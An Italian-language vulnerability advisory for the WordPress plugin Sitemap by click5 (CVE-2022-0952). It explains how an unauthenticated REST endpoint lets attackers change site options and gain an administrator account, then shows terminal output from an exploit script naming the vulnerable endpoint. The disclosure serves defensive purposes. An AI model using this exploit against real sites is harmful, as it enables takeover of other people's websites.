
Sitemap by click5 < 1.0.36 - Aggiornamento arbitrario delle opzioni non autenticato
Sitemap by click5 < 1.0.36 - Aggiornamento non autenticato di opzioni arbitrarie
Il plugin non dispone di controlli di autorizzazione e CSRF quando aggiorna le opzioni tramite un endpoint REST, e non garantisce che l'opzione da aggiornare appartenga al plugin. Di conseguenza, attaccanti non autenticati potrebbero modificare opzioni arbitrarie del blog, come users_can_register e default_role, permettendo loro di creare un nuovo account amministratore e prendere il controllo del blog.
$ python3 CVE-2022-0952.py -u http://192.168.1.131:5555
The plugin version is below 1.0.36.
The plugin version is 1.0.35
Vulnerability check: http://192.168.1.131:5555
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.
$ python3 CVE-2022-0952.py -u http://192.168.1.131:5555 --fix yes
Vulnerability check: http://192.168.1.131:5555
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
Fixed: You can not longer register
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
Fixed: You can not longer register